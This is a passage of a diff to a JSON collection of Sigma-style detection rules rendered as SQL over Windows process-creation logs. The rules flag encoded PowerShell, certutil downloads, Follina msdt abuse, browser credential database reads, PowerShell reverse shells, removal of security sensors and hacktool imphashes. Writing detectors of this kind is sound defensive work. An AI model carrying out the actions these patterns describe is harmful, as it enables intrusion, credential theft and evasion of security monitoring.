'%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\route.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA%' ESCAPE '\\' OR CommandLine LIKE '%sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA%' ESCAPE '\\' OR CommandLine LIKE '%bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA%' ESCAPE '\\' OR CommandLine LIKE '%AFsAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiAC%' ESCAPE '\\' OR CommandLine LIKE '%BbAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgAp%' ESCAPE '\\' OR CommandLine LIKE 
'%AWwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAK%' ESCAPE '\\' OR CommandLine LIKE '%WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%WwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA%' ESCAPE '\\' OR CommandLine LIKE '%sAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA%' ESCAPE '\\' OR CommandLine LIKE '%bAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_msra_process_injection.yml" + "filename": "proc_creation_win_powershell_base64_reflection_assembly_load.yml" }, { - "title": "Renamed Office Binary Execution", - "id": "0b0cd537-fc77-4e6e-a973-e53495c1083d", - "status": "experimental", - "description": "Detects the execution of a renamed office binary", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Uninstall Crowdstrike Falcon Sensor", + "id": "f0f7be61-9cf5-43be-9836-99d6ef448a18", + "status": "test", + "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon", + "author": "frack113", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Administrator might leverage the same command line for debugging or other purposes. 
However this action must be always investigated" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName IN ('Excel.exe', 'MSACCESS.EXE', 'OneNote.exe', 'POWERPNT.EXE', 'WinWord.exe') OR Description IN ('Microsoft Access', 'Microsoft Excel', 'Microsoft OneNote', 'Microsoft PowerPoint', 'Microsoft Word')) AND NOT ((NewProcessName LIKE '%\\\\EXCEL.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MSACCESS.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\POWERPNT.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WINWORD.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\WindowsSensor.exe%' ESCAPE '\\' AND CommandLine LIKE '% /uninstall%' ESCAPE '\\' AND CommandLine LIKE '% /quiet%' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_office_processes.yml" + "filename": "proc_creation_win_uninstall_crowdstrike_falcon.yml" }, { - "title": "Suspicious File Downloaded From Direct IP Via Certutil.EXE", - "id": "13e6fe51-d478-4c7e-b0f2-6da9b400a829", - "status": "experimental", - "description": "Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "UAC Bypass Using Consent and Comctl32 - Process", + "id": "1ca6bd18-0ba0-44ca-851c-92ed89a61085", + "status": "test", + "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE 
'%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND (CommandLine LIKE '%://1%' ESCAPE '\\' OR CommandLine LIKE '%://2%' ESCAPE '\\' OR CommandLine LIKE '%://3%' ESCAPE '\\' OR CommandLine LIKE '%://4%' ESCAPE '\\' OR CommandLine LIKE '%://5%' ESCAPE '\\' OR CommandLine LIKE '%://6%' ESCAPE '\\' OR CommandLine LIKE '%://7%' ESCAPE '\\' OR CommandLine LIKE '%://8%' ESCAPE '\\' OR CommandLine LIKE '%://9%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%://7-%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\consent.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\werfault.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_certutil_download_direct_ip.yml" + "filename": "proc_creation_win_uac_bypass_consent_comctl32.yml" }, { - "title": "Potential CVE-2022-26809 Exploitation Attempt", - "id": "a7cd7306-df8b-4398-b711-6f3e4935cf16", - "status": "experimental", - "description": "Detects suspicious remote procedure call (RPC) service anomalies based on the spawned sub processes (long shot to detect the exploitation of vulnerabilities like CVE-2022-26809)", - "author": "Florian Roth (Nextron Systems)", + "title": "Malicious Base64 Encoded PowerShell Keywords in Command Lines", + "id": "f26c6093-6f14-4b12-800f-0fcb46f5ffd0", + "status": "test", + "description": "Detects base64 encoded strings used in hidden malicious PowerShell command lines", + "author": "John Lambert (rule)", "tags": [ - "attack.initial_access", - "attack.t1190", "attack.execution", - "attack.t1569.002" + "attack.t1059.001" ], "falsepositives": [ - "Unknown", - "Some cases in which the service spawned a werfault.exe process" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k RPCSS%' ESCAPE '\\')" + 
"SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '% hidden %' ESCAPE '\\' AND (CommandLine LIKE '%AGkAdABzAGEAZABtAGkAbgAgAC8AdAByAGEAbgBzAGYAZQByA%' ESCAPE '\\' OR CommandLine LIKE '%aXRzYWRtaW4gL3RyYW5zZmVy%' ESCAPE '\\' OR CommandLine LIKE '%IAaQB0AHMAYQBkAG0AaQBuACAALwB0AHIAYQBuAHMAZgBlAHIA%' ESCAPE '\\' OR CommandLine LIKE '%JpdHNhZG1pbiAvdHJhbnNmZX%' ESCAPE '\\' OR CommandLine LIKE '%YgBpAHQAcwBhAGQAbQBpAG4AIAAvAHQAcgBhAG4AcwBmAGUAcg%' ESCAPE '\\' OR CommandLine LIKE '%Yml0c2FkbWluIC90cmFuc2Zlc%' ESCAPE '\\' OR CommandLine LIKE '%AGMAaAB1AG4AawBfAHMAaQB6AGUA%' ESCAPE '\\' OR CommandLine LIKE '%JABjAGgAdQBuAGsAXwBzAGkAegBlA%' ESCAPE '\\' OR CommandLine LIKE '%JGNodW5rX3Npem%' ESCAPE '\\' OR CommandLine LIKE '%QAYwBoAHUAbgBrAF8AcwBpAHoAZQ%' ESCAPE '\\' OR CommandLine LIKE '%RjaHVua19zaXpl%' ESCAPE '\\' OR CommandLine LIKE '%Y2h1bmtfc2l6Z%' ESCAPE '\\' OR CommandLine LIKE '%AE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4A%' ESCAPE '\\' OR CommandLine LIKE '%kATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8Abg%' ESCAPE '\\' OR CommandLine LIKE '%lPLkNvbXByZXNzaW9u%' ESCAPE '\\' OR CommandLine LIKE '%SQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuA%' ESCAPE '\\' OR CommandLine LIKE '%SU8uQ29tcHJlc3Npb2%' ESCAPE '\\' OR CommandLine LIKE '%Ty5Db21wcmVzc2lvb%' ESCAPE '\\' OR CommandLine LIKE '%AE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQ%' ESCAPE '\\' OR CommandLine LIKE '%kATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtA%' ESCAPE '\\' OR CommandLine LIKE '%lPLk1lbW9yeVN0cmVhb%' ESCAPE '\\' OR CommandLine LIKE '%SQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0A%' ESCAPE '\\' OR CommandLine LIKE '%SU8uTWVtb3J5U3RyZWFt%' ESCAPE '\\' OR CommandLine LIKE '%Ty5NZW1vcnlTdHJlYW%' ESCAPE '\\' OR CommandLine LIKE '%4ARwBlAHQAQwBoAHUAbgBrA%' ESCAPE '\\' OR CommandLine LIKE '%5HZXRDaHVua%' ESCAPE '\\' OR CommandLine LIKE 
'%AEcAZQB0AEMAaAB1AG4Aaw%' ESCAPE '\\' OR CommandLine LIKE '%LgBHAGUAdABDAGgAdQBuAGsA%' ESCAPE '\\' OR CommandLine LIKE '%LkdldENodW5r%' ESCAPE '\\' OR CommandLine LIKE '%R2V0Q2h1bm%' ESCAPE '\\' OR CommandLine LIKE '%AEgAUgBFAEEARABfAEkATgBGAE8ANgA0A%' ESCAPE '\\' OR CommandLine LIKE '%QASABSAEUAQQBEAF8ASQBOAEYATwA2ADQA%' ESCAPE '\\' OR CommandLine LIKE '%RIUkVBRF9JTkZPNj%' ESCAPE '\\' OR CommandLine LIKE '%SFJFQURfSU5GTzY0%' ESCAPE '\\' OR CommandLine LIKE '%VABIAFIARQBBAEQAXwBJAE4ARgBPADYANA%' ESCAPE '\\' OR CommandLine LIKE '%VEhSRUFEX0lORk82N%' ESCAPE '\\' OR CommandLine LIKE '%AHIAZQBhAHQAZQBSAGUAbQBvAHQAZQBUAGgAcgBlAGEAZA%' ESCAPE '\\' OR CommandLine LIKE '%cmVhdGVSZW1vdGVUaHJlYW%' ESCAPE '\\' OR CommandLine LIKE '%MAcgBlAGEAdABlAFIAZQBtAG8AdABlAFQAaAByAGUAYQBkA%' ESCAPE '\\' OR CommandLine LIKE '%NyZWF0ZVJlbW90ZVRocmVhZ%' ESCAPE '\\' OR CommandLine LIKE '%Q3JlYXRlUmVtb3RlVGhyZWFk%' ESCAPE '\\' OR CommandLine LIKE '%QwByAGUAYQB0AGUAUgBlAG0AbwB0AGUAVABoAHIAZQBhAGQA%' ESCAPE '\\' OR CommandLine LIKE '%0AZQBtAG0AbwB2AGUA%' ESCAPE '\\' OR CommandLine LIKE '%1lbW1vdm%' ESCAPE '\\' OR CommandLine LIKE '%AGUAbQBtAG8AdgBlA%' ESCAPE '\\' OR CommandLine LIKE '%bQBlAG0AbQBvAHYAZQ%' ESCAPE '\\' OR CommandLine LIKE '%bWVtbW92Z%' ESCAPE '\\' OR CommandLine LIKE '%ZW1tb3Zl%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2022_26809_rpcss_child_process_anomaly.yml" + "filename": "proc_creation_win_powershell_hidden_b64_cmd.yml" }, { - "title": "SQLite Chromium Profile Data DB Access", - "id": "24c77512-782b-448a-8950-eddb0785fc71", + "title": "Potential Arbitrary Command Execution Using Msdt.EXE", + "id": "258fc8ce-8352-443a-9120-8a11e4857fa5", "status": "experimental", - "description": "Detect usage of the \"sqlite\" binary to query databases in Chromium-based browsers for potential data stealing.", - "author": "TropChaud", + "description": "Detects processes leveraging the \"ms-msdt\" handler or the \"msdt.exe\" binary to execute arbitrary commands as seen 
in the follina (CVE-2022-30190) vulnerability", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1539", - "attack.t1555.003", - "attack.collection", - "attack.t1005" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product = 'SQLite' OR (NewProcessName LIKE '%\\\\sqlite.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sqlite3.exe' ESCAPE '\\')) AND (CommandLine LIKE '%\\\\User Data\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Opera Software\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ChromiumViewer\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%Login Data%' ESCAPE '\\' OR CommandLine LIKE '%Cookies%' ESCAPE '\\' OR CommandLine LIKE '%Web Data%' ESCAPE '\\' OR CommandLine LIKE '%History%' ESCAPE '\\' OR CommandLine LIKE '%Bookmarks%' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_sqlite_chromium_profile_data.yml" - }, - { - "title": "Potential Powershell ReverseShell Connection", - "id": "edc2f8ae-2412-4dfd-b9d5-0c57727e70be", - "status": "stable", - "description": "Detects usage of the \"TcpClient\" class. Which can be abused to establish remote connections and reverse-shells. 
As seen used by the Nishang \"Invoke-PowerShellTcpOneLine\" reverse shell.", - "author": "FPT.EagleEye, wagga", - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "falsepositives": [ - "Administrative might use this function to check network connectivity" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND (CommandLine LIKE '% System.Net.Sockets.TCPClient%' ESCAPE '\\' AND CommandLine LIKE '%.GetBytes%' ESCAPE '\\' AND CommandLine LIKE '%.Write%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe') AND (CommandLine LIKE '%IT\\_BrowseForFile=%' ESCAPE '\\' OR (CommandLine LIKE '% PCWDiagnostic%' ESCAPE '\\' AND (CommandLine LIKE '% /af %' ESCAPE '\\' OR CommandLine LIKE '% -af %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_powershell_reverse_shell_connection.yml" + "filename": "proc_creation_win_msdt_arbitrary_command_execution.yml" }, { - "title": "Shell32 DLL Execution in Suspicious Directory", - "id": "32b96012-7892-429e-b26c-ac2bf46066ff", - "status": "experimental", - "description": "Detects shell32.dll executing a DLL in a suspicious directory", - "author": "Christian Burkard (Nextron Systems)", + "title": "Ping Hex IP", + "id": "1a0d4aba-7668-4365-9ce4-6d79ab088dfd", + "status": "test", + "description": "Detects a ping command that uses a hex encoded IP address", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1218.011" + "attack.t1140", + "attack.t1027" ], "falsepositives": [ - "Unknown" + "Unlikely, because no sane admin pings IP addresses in a hexadecimal form" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID 
= '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%shell32.dll%' ESCAPE '\\' AND CommandLine LIKE '%Control\\_RunDLL%' ESCAPE '\\' AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%LocalAppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\')))" - ], - "filename": "proc_creation_win_rundll32_shell32_susp_execution.yml" - }, - { - "title": "Suspicious Hacktool Execution - Imphash", - "id": "24e3e58a-646b-4b50-adef-02ef935b9fc8", - "status": "experimental", - "description": "Detects the execution of different Windows based hacktools via their import hash (imphash) even if the files have been renamed", - "author": "Florian Roth (Nextron Systems)", - "falsepositives": [ - "Legitimate use of one of these tools" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Imphash IN ('bcca3c247b619dcd13c8cdff5f123932', '3a19059bd7688cb88e70005f18efc439', 'bf6223a49e45d99094406777eb6004ba', '0c106686a31bfe2ba931ae1cf6e9dbc6', '0d1447d4b3259b3c2a1d4cfb7ece13c3', '1b0369a1e06271833f78ffa70ffb4eaf', '4c1b52a19748428e51b14c278d0f58e3', '4d927a711f77d62cebd4f322cb57ec6f', '66ee036df5fc1004d9ed5e9a94a1086a', '672b13f4a0b6f27d29065123fe882dfc', '6bbd59cea665c4afcc2814c1327ec91f', '725bb81dc24214f6ecacc0cfb36ad30d', '9528a0e91e28fbb88ad433feabca2456', '9da6d5d77be11712527dcab86df449a3', 'a6e01bc1ab89f8d91d9eab72032aae88', 'b24c5eddaea4fe50c6a96a2a133521e4', 'd21bbc50dcc169d7b4d0f01962793154', 'fcc251cceae90d22c392215cc9a2d5d6', '23867a89c2b8fc733be6cf5ef902f2d1', 'a37ff327f8d48e8a4d2f757e1b6e70bc', 'f9a28c458284584a93b14216308d31bd', '6118619783fc175bc7ebecff0769b46e', 
'959a83047e80ab68b368fdb3f4c6e4ea', '563233bfa169acc7892451f71ad5850a', '87575cb7a0e0700eb37f2e3668671a08', '13f08707f759af6003837a150a371ba1', '1781f06048a7e58b323f0b9259be798b', '233f85f2d4bc9d6521a6caae11a1e7f5', '24af2584cbf4d60bbe5c6d1b31b3be6d', '632969ddf6dbf4e0f53424b75e4b91f2', '713c29b396b907ed71a72482759ed757', '749a7bb1f0b4c4455949c0b2bf7f9e9f', '8628b2608957a6b0c6330ac3de28ce2e', '8b114550386e31895dfab371e741123d', '94cb940a1a6b65bed4d5a8f849ce9793', '9d68781980370e00e0bd939ee5e6c141', 'b18a1401ff8f444056d29450fbc0a6ce', 'cb567f9498452721d77a451374955f5f', '730073214094cd328547bf1f72289752', '17b461a082950fc6332228572138b80c', 'dc25ee78e2ef4d36faa0badf1e7461c9', '819b19d53ca6736448f9325a85736792', '829da329ce140d873b4a8bde2cbfaa7e', 'c547f2e66061a8dffb6f5a3ff63c0a74', '0588081ab0e63ba785938467e1b10cca', '0d9ec08bac6c07d9987dfd0f1506587c', 'bc129092b71c89b4d4c8cdf8ea590b29', '4da924cf622d039d58bce71cdf05d242', 'e7a3a5c377e2d29324093377d7db1c66', '9a9dbec5c62f0380b4fa5fd31deffedf', 'af8a3976ad71e5d5fdfb67ddb8dadfce', '0c477898bbf137bbd6f2a54e3b805ff4', '0ca9f02b537bcea20d4ea5eb1a9fe338', '3ab3655e5a14d4eefc547f4781bf7f9e', 'e6f9d5152da699934b30daab206471f6', '3ad59991ccf1d67339b319b15a41b35d', 'ffdd59e0318b85a3e480874d9796d872', '0cf479628d7cc1ea25ec7998a92f5051', '07a2d4dcbd6cb2c6a45e6b101f0b6d51', 'd6d0f80386e1380d05cb78e871bc72b1', '38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650', 'ada161bf41b8e5e9132858cb54cab5fb', '2a1bc4913cd5ecb0434df07cb675b798', '11083e75553baae21dc89ce8f9a195e4', 'a23d29c9e566f2fa8ffbb79267f5df80', '4a07f944a83e8a7c2525efa35dd30e2f', '767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', 
'3de09703c8e79ed2ca3f01074719906b', 'a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2', '32089b8851bbf8bc2d014e9f37288c83', '09D278F9DE118EF09163C6140255C690', '03866661686829d806989e2fc5a72606', 'e57401fbdadcd4571ff385ab82bd5d6d', '84B763C45C0E4A3E7CA5548C710DB4EE', '19584675d94829987952432e018d5056', '330768a4f172e10acb6287b87289d83b') OR (Hashes LIKE '%IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3A19059BD7688CB88E70005F18EFC439%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=bf6223a49e45d99094406777eb6004ba%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4C1B52A19748428E51B14C278D0F58E3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=672B13F4A0B6F27D29065123FE882DFC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9528A0E91E28FBB88AD433FEABCA2456%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=D21BBC50DCC169D7B4D0F01962793154%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=F9A28C458284584A93B14216308D31BD%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6118619783FC175BC7EBECFF0769B46E%' ESCAPE '\\' OR Hashes LIKE 
'%IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=563233BFA169ACC7892451F71AD5850A%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=87575CB7A0E0700EB37F2E3668671A08%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=13F08707F759AF6003837A150A371BA1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1781F06048A7E58B323F0B9259BE798B%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=713C29B396B907ED71A72482759ED757%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8B114550386E31895DFAB371E741123D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9D68781980370E00E0BD939EE5E6C141%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=B18A1401FF8F444056D29450FBC0A6CE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=CB567F9498452721D77A451374955F5F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=730073214094CD328547BF1F72289752%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=17B461A082950FC6332228572138B80C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=819B19D53CA6736448F9325A85736792%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0588081AB0E63BA785938467E1B10CCA%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4DA924CF622D039D58BCE71CDF05D242%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E7A3A5C377E2D29324093377D7DB1C66%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF%' ESCAPE 
'\\' OR Hashes LIKE '%IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E6F9D5152DA699934B30DAAB206471F6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3AD59991CCF1D67339B319B15A41B35D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=FFDD59E0318B85A3E480874D9796D872%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0CF479628D7CC1EA25EC7998A92F5051%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=D6D0F80386E1380D05CB78E871BC72B1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=38D9E015591BBFD4929E0D0F47FA0055%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0E2216679CA6E1094D63322E3412D650%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=11083E75553BAAE21DC89CE8F9A195E4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hashes LIKE 